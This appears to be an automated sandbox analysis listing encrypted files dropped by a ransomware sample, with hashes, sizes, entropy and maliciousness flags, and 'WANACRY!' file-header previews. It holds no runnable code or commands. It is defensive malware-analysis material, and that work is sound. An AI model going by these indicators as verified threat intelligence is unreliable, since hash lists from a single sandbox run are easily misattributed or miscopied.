                                SSDEEP:384:lhmyBMd34sPfz3FY8XiYErHBBTJ0zhBj6VxIKAbQK:lFBMdosPzFBXrI1yXj6zIKs1
                                MD5:FF73082314F9E6DCD7751FD87B4B042F
                                SHA1:830D54B7F745A6659019A500C9398F4724B9198E
                                SHA-256:8CF438E0B7B73D4062BA2320DF33F529ABCCA4BC545F203878E1751FFEF00FFF
                                SHA-512:A367279D1B81BBDE6CDF0868AF860CF526FBFC933634E36815CFE83871A2E77968A12E2953BFA9C232C8B732B7A7A32BC4967C27CCFFDE435E982E2C3B0E85C7
                                Malicious:false
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):49160
                                Entropy (8bit):7.995621412312451
                                Encrypted:true
                                SSDEEP:768:enBd+w8gAVri36ckB2KFMtvW5fzBh8pKy8o8vrEMupBgS8/4QcGgrUbHxElZHVC0:ebJPAO6v/a1WJdhGDK4ryBcdWGzcpy
                                MD5:56B635FDADD32E72CE2E08AA60FF3AF4
                                SHA1:390A19B78ED2738E2AC4725C111590A6DA0A2B9C
                                SHA-256:16121E77CEEB1B0C4C16E559CC6D284047577E35F91FC6E073036C143C379D49
                                SHA-512:92B5FFE56012C400F085E95EA68CE33F2F45FEC181C0E9E8C338D4C426DCD60BEB2AEDBA933B47A3E458A2EC77EF87A546E20C6019E51F934EB6522F8DAEC301
                                Malicious:true
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):40328
                                Entropy (8bit):7.994770624576006
                                Encrypted:true
                                SSDEEP:768:zNm4oTk9t+VBuSb6bkocH0QsfrBhzv5K90k2kxI7Rh:5ETk9t+V90QsfrS2D7Rh
                                MD5:86AF0EFA74A74C71BD847B8E98E9DF3E
                                SHA1:32AEB9F7F0194E202640EDA7B4CD0F5054FB2038
                                SHA-256:B619038072C0109DB085BD43681AD701371086D1AFE5152DC1F357F17C913632
                                SHA-512:1935D570153AA003987A982FBB00EECAB96C0AC8BC033872FE3C20C39FE5D8F985B64970AA319D49E83EB339132F2A362C50241FB2BEC021268E555949A4689F
                                Malicious:true
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):799560
                                Entropy (8bit):7.999788883461205
                                Encrypted:true
                                SSDEEP:24576:t8H7Mh0HdftRyCNmTe9oYsaAiyqBXiHP/in886:tPiHdf3yCNZ4iZBXiv/in886
                                MD5:857E37794294AD27DD71FE7FAD518708
                                SHA1:D0F5129A5D677317D4C06742C3DC91DA0244B6E2
                                SHA-256:D5638464EC02F8CCA459FFDB7B32573503DEA91F21CBED28E2E2D675305D3C80
                                SHA-512:3E2BC37A6F6D6EC629DD9F8C6E3AE0B9C67A68017DB963AC9199584A7E9B0A632E94D019EE4EFA8AEC4B3B9E94DB82B403FF7B08B3615078BBB583987A2F5C99
                                Malicious:true
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):89144
                                Entropy (8bit):7.998195851740088
                                Encrypted:true
                                SSDEEP:1536:rHsy5UKBGQ9KVnYXR4dJMeDIi9PeX9Dxpf3Fqg0T+/QfR+cVYXvtTJn:rlUKBGQ9KVnYXR4zM1iA9gg0NRNVYfzn
                                MD5:28C1F1C542F40B128268CD67F83A1649
                                SHA1:AD1D412AE5590C242603B6EF331B897E87FEBB4C
                                SHA-256:AEF1DB307348C0DCE0A7F668CF76349A447504FAE0477F14F2793AAF788D4E4E
                                SHA-512:1FDDA9773BC7B0E61506221B8153E63FE50D537B85FA2CA349E48F1F6E4AF6DAF1CD8CE748574261986E03F32E6B124FDA2AA5A187E980703C82E6F6434F5513
                                Malicious:true
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):186072
                                Entropy (8bit):7.99898605840687
                                Encrypted:true
                                SSDEEP:3072:43plQiwYlg5czwfxot7VywUKStM+Q++OxeoWnI24qLdj4VnDcqk0NbfsnTKVUhI:4LIYG5WwfO5+PxelIedjODcqk0Nbfsn0
                                MD5:2B5101D3A4C9640231CCC0338F202DDA
                                SHA1:245FDB1D00D674074706ABF05AF57AFF516A056B
                                SHA-256:DCAA3DCE6B5458301F096EE2A380DCCE19E501B6759950EFC95EF9606F766BF5
                                SHA-512:79A9F274A3986D7EA2CDF0B0990970147AE9A346961E519A8332CA19FEB98B8BC7ED502CFC45BDC43FF047678D4ADC0E3D063AD27FEF05295A84D14BB22C6CDF
                                Malicious:true
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):17736
                                Entropy (8bit):7.988540576660658
                                Encrypted:false
                                SSDEEP:384:glmskKnYWeQGDYKqDio5m0RlHMCzwSzVx9y6a2CojO:gekkpjqD/mypzzx9y3Y6
                                MD5:345E6A36EA4025A3082906F7F9AB8FC3
                                SHA1:E510FD4488D5EF2F24E21AEDCE7296B51E84F7A3
                                SHA-256:D99E2AF89B0AE22D623EDB8F4222680C4C4BA269CF8F8BD49A5E9CAF6D8103AF
                                SHA-512:17922FC8325D2BCE0183B592E83D79994FC3398B294AEEB887351A82F08F928FD850E22B193D916E595C239396523F02AE45A768C8FF8CD8C59C365682FA2DEE
                                Malicious:false
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):73912
                                Entropy (8bit):7.997339375274032
                                Encrypted:true
                                SSDEEP:1536:M4m9jKp+mL2To5/4ZFOVwsVL85eQ9hANFddPl8:dSjzmOo5/4bYwsWc4hALP+
                                MD5:002F9474F6B144D511043CABF1EFB29B
                                SHA1:4037FB94EFF17EC26C4C956A152F57CE332EAA28
                                SHA-256:8457F673460CB4965856E531BEB643E603D2B7D2DF095CD59CCFFA3D29E7C698
                                SHA-512:042509C7434A8B003D78532164202D8A34B86E49E4B7E713E59CD76EECC32CA21110841DABE94135362BE7B6FFB6B7F03810658401A54D28E7387FD538FB7E0A
                                Malicious:true
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):19336
                                Entropy (8bit):7.989886519735407
                                Encrypted:false
                                SSDEEP:384:ht7hUBeyWBTPMWC3otDzkVjo9JogsgILrnq0jT1A1PNOI8SQMDK:hdmBQJzCizkVjo0iUrq0jTi1P58QG
                                MD5:3639642B7094483ABCB4DBCA2BEDDAD1
                                SHA1:9B85592C282A291358E3A0C6CB99B5177B7A2F9A
                                SHA-256:FFB228408E056F76C40229F00C07CC0FD4DC4DA1F0AEACA2EDC4F21058494DA5
                                SHA-512:F9E62BB4235A7D341A5AB8A097A0D5EA0D869BE700D14598012AB1F4BD4897BC72F9C518F424D4FD03C5C1D4841A1062F7967B9CD1544CDC56E7ACBB18C58B5D
                                Malicious:false
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):20680
                                Entropy (8bit):7.991114500397896
                                Encrypted:true
                                SSDEEP:384:6fF373w5y7p4sq7x0LqOVtFN8BQc6kB9fiJO5+xyX1J95utPa:6fB72y7p4sI4DrrkB9QO57X0a
                                MD5:271076DC28DC047D275E9623D49FA40E
                                SHA1:364F0250867D605D2E180ED7A07FC5BA2161F80D
                                SHA-256:12A1E23BCF821BEF4F37A3E8C4A78604EC3AE8F38C1BE31F574E114413406AF7
                                SHA-512:AEB9DAFEE92D3DBD875613AD1A56EBA9669453A9D6AC375508B04250C97FC2C148EEC8CBF117CFB78EAA10B9A00F1C036606F45A5DBAC653AC2DEE70EC6206F3
                                Malicious:true
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1608
                                Entropy (8bit):7.870503596825595
                                Encrypted:false
                                SSDEEP:48:bkwaL9rLGB/xzbtv6/LoLYpehSjgAkCaIFl7zJvIYabSmn:owaJmzs8Epey1auXJv9On
                                MD5:91BAFB1B719F870F604AE8E7E0A00222
                                SHA1:6D0F152CEBB7D740872258A6EC63A62C7B6ABABE
                                SHA-256:A7BF26DB8A17EA844D5FB0E2D024559A8185C738E85E9A65189BF0E08C1A0DB4
                                SHA-512:151E850AA29A5EAC4C711B44D2115D1C838C70331E4D22798480C9B5963CE3539258D927A6290D814AD617F43A9999A349698776C90B3624A3EA28F737F654D1
                                Malicious:false
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):37464
                                Entropy (8bit):7.994587542982609
                                Encrypted:true
                                SSDEEP:768:b9B4StTbu7V9gFVyMpEHcbz03L+Yo9Te+EVCwXY:bcmTy8FVyCE8bz03L+YN+ACwXY
                                MD5:F4938103BC30BE9C3766B94F337723CE
                                SHA1:CB447A8F7F87E305D5CB855A4605CDF2C24D0D27
                                SHA-256:C8DC3BEE97AC9A3D5E2DF9E4C7A59948A1529FBC5C7CE0DCE6C079108387ECC8
                                SHA-512:03E4948B77091860E7FC7BC4B7E85E535F8B6AE0DBA82F078135DA689ED16ABC2C5E13E212532A319BE8DA0DBD577CE39F8AD0D2432D2A5951D699DA3E1E4031
                                Malicious:true
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):168968
                                Entropy (8bit):7.9989785551961194
                                Encrypted:true
                                SSDEEP:3072:Jw9UXCTr630xiXDKF9v1fK6Bf7yN9deBaNncN5N81q/vp7b/9PMqR:JoUXyr6kAkdpK6dyN9kgcNX8E3Jr9PMM
                                MD5:6E943240ABD34AC785765EF07802D85C
                                SHA1:532ACAAF3872E4169ECC95BA71F51353AE4A0BE0
                                SHA-256:A2B574165772A03EA57770ADD0438C5A07A86C7036918F4CA1397B2F4A2A598A
                                SHA-512:2A706FA33409BDABC8814CC051C67F4AEC2AC12FBDA4A21F27D44F7D7CC6E149C3ABA40C2EBC431E3E0128A8C3615719AF6746510CE6C3885912592945A3F587
                                Malicious:true
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):51224
                                Entropy (8bit):7.995672375915484
                                Encrypted:true
                                SSDEEP:1536:6v6OvH1VI/ubGMUBrP9x3N6jnwFsUxkY+q3:6SY1XK9BN6cFfx/r3
                                MD5:2B37747A713EFD334C93B3D16CEF456F
                                SHA1:7FA577A621C93F5A70023B7FA235E2402243DEB9
                                SHA-256:A92BDFF33DEB04071B4D1E0FD7DB647C85B2F1B7CF08C31BD6AD2E8E6EC8A268
                                SHA-512:032560553D88C47FA58BABD61F2CE66C4D5FD241F93295DC2B7902D25A24EB8AAB61526A837DCA86B445279B936EE4B25ABFD9ABAF8D003504EF228D846B90E1
                                Malicious:true
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):69016
                                Entropy (8bit):7.997042868526277
                                Encrypted:true
                                SSDEEP:1536:w59iwmDiTVpqmj/ZGOh1IDKwu5jxBdqH8VWIy6sY9:m9dmDwZb4OLIDvu5VBdqiWIyq
                                MD5:F411D6F1D8E15E8EC6ED3D4C760F76B8
                                SHA1:FFFE32DB8F0DA72AB8F06D0BFA6FFBF6249A63C1
                                SHA-256:43A44A5D0CC47E32F56AE156FAAE2678EC7666E0B42ED4BB8EB778440EFC89CD
                                SHA-512:AB4A7DC7B36FD6278033C6FE9886CFBF81521BE66EA936FBEB23193258E02FBDF73CEFA15FED56B6FCF40A81FA94608954874C59958B1E52955F92DC3F5FFE1E
                                Malicious:true
                                Reputation:unknown
                                Preview:WANACRY!
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):47576
                                Entropy (8bit):7.996351379468486
                                Encrypted:true
                                SSDEEP:768:PIAnuiL98SeaPqel3jjy/c6xFaTJLaQ0Ux9SDNFHPA8YZP+zJst5xnkdRDysxO:AAnu+lRQUxsDNdAtP+zORniS
                                MD5:B918EC7728E524724F1CDFD950FB41F8
                                SHA1:6F8E1D5D48E13EEACE78E930AC2F951832C3CBB2
                                SHA-256:2FAD24BC329700A5368199743D33C94497D2E9377DA7FB7239A6B77B6C4EA69B
                                SHA-512:EAC79FF76430164C0115FED61D45E35E42E5DBE8F3B96A943771B54EB75A78A57B3634FE696707CF1B031D96404D02B05DDC97B75A6B4D5CE6ABE5960414D51F
                                Malicious:true
                                Reputation:unknown
                                Preview:WANACRY!
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):40984
                                Entropy (8bit):7.995595406679536
                                Encrypted:true
                                SSDEEP:768:6qu5OgHQLsYLHSU857FRWjO0HG3YaqI4vw89blWR+g/i:hgHQLpLHeFsOiKB4vwwIE6i
                                MD5:FC29968C24759B854B7C57EAEFBB45B5
                                SHA1:ECC5CCAA47554B3AB01EC8FF5DD15E519C9F3A2F
                                SHA-256:F56374B89593DA2B66F37BC640896EAF73DD09BFA568087B28B8733E712943AB
                                SHA-512:B3E6694F2486C565600731B4B4EF8A46F00EEDCAD5134C4B5369838C5C2907F43A989BE71D8E8A27014E8E1D0D1A1F2A29044D6401CC3C3A42D28433BD852A04
                                Malicious:true
                                Reputation:unknown
                                Preview:WANACRY!
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):125288
                                Entropy (8bit):7.998553445878312
                                Encrypted:true
                                SSDEEP:3072:tE14rNsx9SzsvmgucpQ2pZyHzaBgTY6PBbtEZSLN:tEWrIksVjpQzYgnZbtV
                                MD5:07FC11CE9850703CFE71441FCAB3EA41
                                SHA1:B82DF49233927E9932AE21955FA560D3B45D2945
                                SHA-256:EA6FF0AAAD53A050E54FF471CE77DDC5C70F17866606401AED2E5F7CE4C5AC27
                                SHA-512:B28C6DB2EE79CC345ACFE5AAAF4B8A801E530FB5A8B97205C04DF122855187769D5D831F054FFEC146D6AF5458D7AD0CF6D86090F4003024D43683290F3ED48C
                                Malicious:true
                                Reputation:unknown
                                Preview:WANACRY!
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.832522092590801
                                Encrypted:false
                                SSDEEP:24:bkObMJ46FJiM0qR2BIklBTYJid9cpOiv6Y+hvY+IM2uv+osQlyN0q:bkl46FJiMJgWklBQiDcpYYyvY+AGvrUN
                                MD5:B8F6B29F78898399B73C248FCFE9E078
                                SHA1:C278B26CE2DAB6431750D2E4E479B2596D277A0F
                                SHA-256:098585C264F1EEEB90092D3F2F939378837DC80435E318B09EA86FF24B4250E5
                                SHA-512:BF1807AC66D2168EAFB92E418AEBB0A9F9C794AF5F7C49FD87AC04C4CAABE3E470D5AE232D40388527EBE2BA80D5780260D0A0CA274921507D3D482F7FE62DE4
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.8505685355613
                                Encrypted:false
                                SSDEEP:24:bk/xlR+gOH/vnTIn1tH4fv6m0kPwx3JqyKAVXwkmeSILX:bk/RkfG1tHeoJq6Hme3
                                MD5:1E5C277D620571C2E899B291161AF83A
                                SHA1:0A25848000F6BC17AFD724107DC08E968DB0C35F
                                SHA-256:F0D3CC05FCB513C107DA7F23C3E41B37766945EFB6F6EA244A6E651D6C989EF5
                                SHA-512:60987DF412BEB71756B9A43C2A54AC15C62804191F84B2CA43FF0315D6CB50DF6FCBDEBE6DA78024B6D33FCA02AB70DAC71343C8B467DF4FCBE0DFAE411FD58F
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.814028573461258
                                Encrypted:false
                                SSDEEP:24:bkmY3RoUPTqMKQX+hPc6UownNv1754jF1wi2LrRGnkgKN+W4:bkmmRRrqMRXec6Av1mJOjR9nNW
                                MD5:FA3954774C3BED2B0C03FA7ED3B0D995
                                SHA1:F0EAC93DB39695ADC1B015B63798850034DFAE8E
                                SHA-256:AFA7AD6B2DAF8E270CEC41CCDFFF8DEE27F9DA0F4E92780DEB854712768542A1
                                SHA-512:1D84901E540121B3375A2D51F616819BA12E584A379288D62E203C57BE7AC4756E15F27956532605E97CF20CB1CBE525CF4803B7C4EF94EA76CBE4554F8A8222
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.8433977714800385
                                Encrypted:false
                                SSDEEP:24:bkUZNLqZ12toDwSxwksoiUWxO5qD9J16s4qWOmJwmB5TVgPBzxra:bkUZgZ12tUDRFi15Lo95O+w65Z0Za
                                MD5:794F8BB42C90B566FA9CAE748E9893A7
                                SHA1:D9F03C214BB83DBB391F39E7EB1CE901AF9C2585
                                SHA-256:C66A0F5626178A25A8CD961B9F3BC9423638F815C6F6FD7AB9DAC10345B549B9
                                SHA-512:453A31C57C19079C6278C31763C91C64DE678B5041C9D32A48F44BBCD2D08E1A4EFB9FB743F468D4EA49350A7B90E2DF3103BC8E3003AD00617751FCB21FB332
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.8307922297876615
                                Encrypted:false
                                SSDEEP:24:bkCshLIvt+eIwfOb9qhz46lcmxxqzxbumO7WUZe3MAFyMBRREW1mDCBmeMOA+yTe:bkCnzbfBhzgCAxCkUIt3EWMC0eMcl
                                MD5:51945D90B02325120FBE1391081280D6
                                SHA1:24FAF4FE9B05E32D422C0055658C749EE53D5D84
                                SHA-256:07A7D3B178579AF322C4E52005479633912CFFFDA2B8E562CB2827EBE554A30A
                                SHA-512:4B0587976C065F9E99E135878799C698280ADE00B02B6CC3C571B99D255EBBB7941B62554988CC472AFA9351AD7BC3A7FB1BFC81782E091EB2F70122678F521A
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.849610407296905
                                Encrypted:false
                                SSDEEP:24:bkLwiL/pEep6VotNcoR+kA9K02Q8DnOZtiAagOV8WcEy3JkAPQG7dwqVgl3:bkLT/ZpEotNcoAkdO46tiAO8gkJk+7dW
                                MD5:6B73524B59B45C1F19AD3421AC7221D4
                                SHA1:A0E76F6CC37A9C393E8889D9216C6B75B5DCE5CD
                                SHA-256:CB5A6950224D0EA4534DDE00C97F6E638B593FB29C535545667685F82E36F7D7
                                SHA-512:52C3B93AFB8D1C1CC3849C56DF7EC25C84BCF7E0E2AE94A4920D57B5350265ED36249C87F63027B09C39D9E7002837EE6E6EA1515B1A8FD9FB4861332823E38B
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.827183757966153
                                Encrypted:false
                                SSDEEP:24:bk9+Elro9Xq4i6luI4V4kOZfTsCErKcaoy/T6x/2t5fWgg8Kn:bk9+ME9LiRV2sCeKcS7aujWgg8i
                                MD5:EB46443E15D80AE116C4DFF6D6ABDFA2
                                SHA1:4BD3E8BFC9BA7FDE65AA6FDEC8D6458690DE928F
                                SHA-256:015BAF595D6A70164F487EC960938A58A061A981C7B06D2B0A0481E082CBD624
                                SHA-512:A6F5FE08B6056A43C9F1EF2C09B0043FB6EF4EE51FEF316604D5E49FFD59051F98FC40EF5360F845CC615BEB73B17D3E96B79735457157723D459981348F767A
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.829501966490435
                                Encrypted:false
                                SSDEEP:24:bk5Kwyp+nmMAL0msq8Gh969ZF3iK1gdJhg7RzG4FB69mYJdkbTKJzJbzgqs:bk59yp+mhGqr69p+Gz4f7GcZzgN
                                MD5:21258B25FE371FEEAE47C7914FA4413C
                                SHA1:B008F21F954775F6D5F16D6CDF4F16DD41443F67
                                SHA-256:EB52EDAB1D6DD6934B1047D806BAE4C971DAE6D70FDF5B99F163601E3998404F
                                SHA-512:71B7DE90DF176D2F47419DFB7A2C1BE2ABEA154EC81F58C9B4885621A50EF6380ABAF13EF77CAD64095E020690C07A3771F65CCFA44C2D077F0EC79407AA2728
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.825624611685154
                                Encrypted:false
                                SSDEEP:24:bkP1j7EVne+yELihKKAjoc37CPo0MOeSwgpnHBMcz9CBOwz2izUW:bkP1j7UnnLinnYOeSNnH6wOLzUW
                                MD5:F04D85D7B05F7672198B088110326E83
                                SHA1:D2610A5EFB698C6ED09A667EDC0DFC143522FA53
                                SHA-256:6F7EC1BC4085BF7119EEE11EDDE548FA2657B161B18A5D15F2D7408EC5669A1F
                                SHA-512:41C617695F5D490E9406CEB1B14F4E5BAD53EC88CC958713ADF2EA995F12358F78013483850B8A2D5B67A511E15B76D876DAEBC8EFAC865C51405AA513B007CC
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.8753434673666565
                                Encrypted:false
                                SSDEEP:24:bkdV/Me2kgX6QxO9dR3gEroOrHesuovPUr1LE4GjccfryhoMuogC7TYSdTt:bkvD2kIytcObpu0gXGAu2h5ugkKt
                                MD5:96EFBE79C633FC2B995CA858CD4486C2
                                SHA1:C2BBEF63234AE3C890F38A1DC4A56CE71120E19C
                                SHA-256:CB4F4476D8679290FC9A39811570B6F5A2BB068A2C58FF5AEAC7DBD1C4C467F7
                                SHA-512:70AF35B3666A6D5787B93C903EAF3544CA3EDC2789DA9E5F755E6B806F7B7129CE458562495F1066A2CE81D70A0CB72A96526029A557F42D70BE8649BA625E9D
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.838728057263532
                                Encrypted:false
                                SSDEEP:24:bkxBnLt8TWY+F+WqQpeRT7/ISTZNPVOHDTvbN4Gm43BTAp++hYqFu2RRD0s:bkxBnL6TWYo+ApeRwSOmuqp+sVRBl
                                MD5:821C3F64C2F1FC4412D4F82B5549D4C2
                                SHA1:1BCA29F8840003C2F29D5EE3D9B4B071C7D235DE
                                SHA-256:BA14DFFF6AFB1618A3E686E07C6F43626FAECE4792F69DB6E58F8BDCD747ECA9
                                SHA-512:3211E09D07CBFFE69D6E0AF40429579C09741FD2927E3DEA95A5E2FBAEC96AD11E1854903EC854949E254335A4978A9CBA4DB59BB97C242CA23F89CB0A6377D1
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.8373031912395845
                                Encrypted:false
                                SSDEEP:24:bk9IqATLZdmCRj4DEBW84sUiqVz8Ol2TORWUTNCyiwvkjrN88KXYQ:bk9IqA3uk4DO4sUiqVIOUpUBCLwvkjBm
                                MD5:8DBB61629DA0D5B28E0603A58A1D5F83
                                SHA1:686354635CCF69C231D65305388F8A28157DB3BC
                                SHA-256:AAEBD1DFDFABB4FE5BFF02B60646227D6EBF3FA03E98A524FEE882EC2FA04D06
                                SHA-512:298601FF15312EB036BED0840A001228AB845CF912860828800C98692020168E447621B9D663159DBF6EE0A505F23BB1F653A6B0BB1C54AB3DE64F6E5D1FA4FB
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.843132259331841
                                Encrypted:false
                                SSDEEP:24:bkuprhblkZWpojcPGB2imvWaO5j07ELdvE1iXBe2Cb8ozzqCF4KObZT+mas:bkQlk/jcPGB2DwjEEh0iPCo8zq6Oxas
                                MD5:3E6B211932196947D58C218A1023D457
                                SHA1:2531319188425695109EC3C908EBE8C275A1B78A
                                SHA-256:6E768F0C94FFBAE75519DB6FE5748D5BBD4FEFC7FDDA36A9FD33E2AD04D31EEE
                                SHA-512:3006DA3378D7DE62CB04959FC0CDF0D12C7F309A9EC482EE163F6131BE83D990170B9DCAA12BEF8659506658472B85A5BDEB746DE2FB9E4A17CDE6502426831C
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.854865218310198
                                Encrypted:false
                                SSDEEP:24:bku4wO30EvIoHeLiuJdnvvCPns8Nq/NtLBebN+MwLut5IXCUPr4STkzQKokeW:bku4wBE9H+9nSENy3wLO5IF4SozQGx
                                MD5:FC57EAAB47FB58C71CAD1622AB9ACD34
                                SHA1:E6F418406500D2F582C0C38F020F6A8727CF3C2E
                                SHA-256:83B5D6197DA614D6CEC781CE31D21F082B9A9411F97B1A4936F924EAD0412211
                                SHA-512:B2CF7E6ABC014FEE9E7778779BE6CDE014EAF0CBF3846FEF524546A77EDD482BD9BDFDC766DA3F6A37CD742775818441B86FCAE83861728F7F387300BC2B6FB8
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.834722866247955
                                Encrypted:false
                                SSDEEP:24:bk16CokuxWVsd4cc4A+U0E2ZfKtc8Iw3zZTiX4vIWnmkAY2+aNxHRFM:bk16Cokg0sU4Ah0ZfyVIw3Ja4vIWmk35
                                MD5:993CA612354F87F8B531F568F1349C30
                                SHA1:2B1C70A80BC0C9222454EF1CA292E985A7212F7F
                                SHA-256:29438FCB5DB37F3148A6AA1190C808E93B20524B13115F142CC8A9EE8C91F83F
                                SHA-512:CA7246E6A670D8A0FF8C8A56D1DB5B566D560BB62C775A4465F266782C359F8323DEC7D7E1C382BF0B0931B0CC5F30139ED71D7E268A41345EE5A441E2B3D1E7
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.840221560663818
                                Encrypted:false
                                SSDEEP:24:bkq9WKVrpT1OIvhRZjXKwfSBG3uOWPXEvGnI1DhcNOXYRmG3ICEv/rsec3gn:bkWNVRDDfk+5WPUuneVaOaICGrth
                                MD5:793749CC06DFD3BA53BBFB204C7D4A73
                                SHA1:16D8ECF4F6B21BD6E1700F129829C1F8AC9D8BE9
                                SHA-256:5A6C7783B4AFCC41611A19D9A6CB323ED7403FC7811541CD10A14C7C7DE97E4C
                                SHA-512:8F5EB902300414F446D2921D09BA4131C64E7BEBC2871BB46DE52315D451B8803AD6F4D1377EB3B1BE480EB48CF4BD240D70DCC3F8E566EC2DDE1E0D0298C04C
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):111896
                                Entropy (8bit):7.998505761086846
                                Encrypted:true
                                SSDEEP:3072:ilxfDuGKHHCmdcKE6OcHs5UjS3fVpG7DQ:ilpmPE6Oom9eQ
                                MD5:402DF254DA4CE14676AF08C61D6415C3
                                SHA1:E3E7B1E1EA97863CA1AB10CE235D972102CFCDE1
                                SHA-256:0629B63C824DDEBE755E466D4D63063462E003FB4CFA870CA27ED07E09F8259E
                                SHA-512:B5654D9BDC62B6090BA4B7B4FEE45F2357D8428A52DF688D24F95F95DBDDC6EAF96A75B98D99598CF0DFECFAB5C1A1D6CF67C4EA56D22B974CB1EEDA70C100CF
                                Malicious:true
                                Reputation:unknown
                                Preview:WANACRY!
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):38040
                                Entropy (8bit):7.995224439986361
                                Encrypted:true
                                SSDEEP:768:gevdwsOioGwWkopt71XQi+Hvk/iGk/fR3abt5a6dls1Ebz1EdWvT:gevdfOi9hksgk/VkHQh5a6dBbn
                                MD5:5D46E574464E9B8E1D39BC18B1006AAA
                                SHA1:E46F8A929325FDC049431FE10DD9BAA13B3ADE24
                                SHA-256:047C59015559514967CA1A8F49129E760CA13E4AEA18F5365379B171E4FFEA5F
                                SHA-512:AA7D20DB7C2364305B4B7F82FC0923E868AAB1B349772B6562FDC810B4D8B588D83CD4428E4C22FA1171FDDC9AB2D3EF6D8C198B4CB69D68DE050EF534690922
                                Malicious:true
                                Reputation:unknown
                                Preview:WANACRY!
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
